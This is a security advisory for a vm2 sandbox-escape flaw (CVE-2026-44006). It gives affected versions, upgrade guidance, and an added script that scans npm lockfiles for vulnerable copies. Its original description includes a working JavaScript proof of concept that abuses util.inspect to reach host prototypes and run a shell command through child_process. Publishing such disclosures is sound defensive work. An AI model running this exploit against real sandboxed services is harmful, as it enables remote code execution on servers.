CVE-2026-44006: vm2 Sandbox Escape Allows Remote Code Execution
GHSA-qcp4-v2jj-fjx8 · CVE-2026-44006 · CVSS 10.0
Summary
The vm2 library has a security flaw that could allow an attacker to execute malicious code on a server. This could happen if a developer uses vm2 to run untrusted code. To protect against this, update to the latest version of vm2 and ensure that untrusted code is properly sandboxed or validated.
What to do
- Update GitHub Actions vm2 to version 3.11.0.
- Update vm2 to version 3.11.0.
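To find every installed copy of vm2 that still falls in the affected range, here is an added example (not code from the advisory or the vm2 project) that walks an npm lockfile. It assumes the lockfileVersion 2/3 layout, where installed packages sit in a `packages` map keyed by their `node_modules/...` path; the range `<= 3.10.5` and the fix `3.11.0` are taken from this advisory, and the lockfile below is a constructed sample.

```javascript
// Added example (not from the advisory or the vm2 project): flag vm2 entries
// in an npm lockfile (lockfileVersion 2/3 "packages" map) that fall in the
// affected range of CVE-2026-44006 (<= 3.10.5; fixed in 3.11.0).
const AFFECTED_MAX = '3.10.5';
const FIXED = '3.11.0';

// Compare two dotted numeric versions; a pre-release suffix is ignored.
function compareVersions(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const x = pa[i] || 0, y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

function isAffected(version) {
  return compareVersions(version, AFFECTED_MAX) <= 0;
}

// Walk every installed copy of vm2, including nested ones such as
// node_modules/foo/node_modules/vm2, and report the affected paths.
function findAffectedVm2(lockfile) {
  const pkgs = lockfile.packages || {};
  const hits = [];
  for (const [path, meta] of Object.entries(pkgs)) {
    if (!/(^|\/)node_modules\/vm2$/.test(path)) continue;
    if (meta.version && isAffected(meta.version)) {
      hits.push({ path, version: meta.version, fix: FIXED });
    }
  }
  return hits;
}

// Constructed sample lockfile: one affected direct copy and one nested copy
// that is already on the fixed release.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { dependencies: { vm2: '^3.9.0' } },
    'node_modules/vm2': { version: '3.10.5' },
    'node_modules/some-runner/node_modules/vm2': { version: '3.11.0' },
  },
};

// Run against a real lockfile with: node check-vm2.js package-lock.json
if (typeof require !== 'undefined' && require.main === module) {
  const lock = process.argv[2]
    ? JSON.parse(require('fs').readFileSync(process.argv[2], 'utf8'))
    : SAMPLE_LOCK;
  for (const h of findAffectedVm2(lock)) {
    console.log(`${h.path}: vm2@${h.version} is affected, upgrade to ${h.fix}`);
  }
}
```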
Affected software
| Ecosystem | Vendor | Product | Affected versions | Fix |
|---|---|---|---|---|
| npm | GitHub Actions | vm2 | <= 3.10.5 | upgrade to 3.11.0 |
| npm | – | vm2 | <= 3.10.5 | upgrade to 3.11.0 |
Original title
vm2 has a Sandbox Escape Vulnerability
Original description
### Summary
It is possible to reach `BaseHandler.getPrototypeOf`, which can be used to get arbitrary prototypes
### Details
https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433/lib/bridge.js#L655-L658
`BaseHandler` can be reached via `util.inspect` (same as https://github.com/patriksimek/vm2/commit/57971fa423abeb66f09e47e18102986549474ca8)
### PoC
```js
let obj = {
  subarray: Buffer.prototype.inspect,
  slice: Buffer.prototype.slice,
  hexSlice: () => '',
};
let sym;
let gP, HObjectProto, HObject;
obj.slice(10, {
  showHidden: true,
  showProxy: true,
  depth: 10,
  stylize(a) {
    const handler = this.seen && this.seen[1];
    if (handler && handler.getPrototypeOf) {
      gP = handler.getPrototypeOf;
      HObjectProto = gP(gP(gP(gP(Buffer))));
      HObject = HObjectProto.constructor;
      sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);
    }
    return a;
  },
});
obj = {
  [sym]: (depth, opt, inspect) => {
    inspect.constructor('return process')()
      .getBuiltinModule('child_process')
      .execSync('id', { stdio: 'inherit' });
  },
  valueOf: undefined,
  constructor: undefined,
};
WebAssembly.compileStreaming(obj).catch(() => {});
```
### Impact
Sandbox Escape -> RCE
CVSS 3.1 (GHSA): 10.0
Vulnerability type: CWE-94 Code Injection
- https://github.com/patriksimek/vm2/security/advisories/GHSA-qcp4-v2jj-fjx8
- https://github.com/patriksimek/vm2/blob/408fc855f1cc1bbc2985b029465ee0e732ada433...
- https://github.com/patriksimek/vm2/releases/tag/v3.11.0
- https://github.com/advisories/GHSA-qcp4-v2jj-fjx8
- https://nvd.nist.gov/vuln/detail/CVE-2026-44006
Published: 7 May 2026 · Updated: 28 May 2026 · First seen: 7 May 2026